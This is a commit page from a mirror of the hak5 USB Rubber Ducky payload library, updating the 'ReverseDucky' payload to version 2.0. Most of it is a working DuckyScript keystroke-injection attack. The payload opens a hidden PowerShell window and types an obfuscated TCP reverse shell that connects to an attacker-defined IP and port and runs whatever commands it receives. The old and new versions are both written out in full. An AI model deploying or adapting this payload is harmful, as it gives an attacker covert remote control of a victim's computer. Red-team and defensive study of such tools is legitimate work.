hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #181 from 0iphor13/master 

Updated ReverseDucky to version 2.0
pull/182/head
hak5glytch 2022-11-16 11:01:59 -08:00 committed by GitHub
parent 9587dd9445 cd6a5ccdda
commit d9423475c1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 39 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

54
payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
View File

@ -1,25 +1,47 @@
REM ReverseDucky
REM Version 1.3
REM Version 2.0
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0
REM Reverse shell executed in the background
REM Fill in Attacker IP & Port in line 18
REM TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
REM Define the attacker IP and PORT at line 38 & 39
REM DON'T FORGET TO START LISTENER
REM Extension DETECT_READY by Korben for best and fastest deployment
EXTENSION DETECT_READY
REM VERSION 1.0
REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
REM TARGETS:
REM Any system that reflects CAPSLOCK will detect minimum required delay
REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
REM CONFIGURATION:
DEFINE RESPONSE_DELAY 25
DEFINE ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
CAPSLOCK
DELAY RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Define the attackers IP & Port
DEFINE ADDRESS '0.0.0.0'
DEFINE PORT 4444
DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -W hidden
DELAY 250
ENTER
DELAY 200
STRING $I='ATTACKER-IP';$P=PORT;$0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient
DELAY 200
STRING ($I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'jec
DELAY 200
STRING t') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Reve
DELAY 200
STRING rseDucky '+(&('g'+'l'))+'~ ';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close()
ENTER
STRINGLN powershell -NoP -NonI -w h
DELAY 500
STRINGLN $0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient( ADDRESS , PORT );$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Ducky@PS '+(&('g'+'l'))+'> ';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close();exit
CAPSLOCK

2
payloads/library/remote_access/ReverseDuckyIII/payload.txt
View File

@ -1,5 +1,5 @@
REM ReverseDucky3
REM Version 1.2
REM Version 1.2 (End of Life - This payload won't be updated anymore)
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0iphor13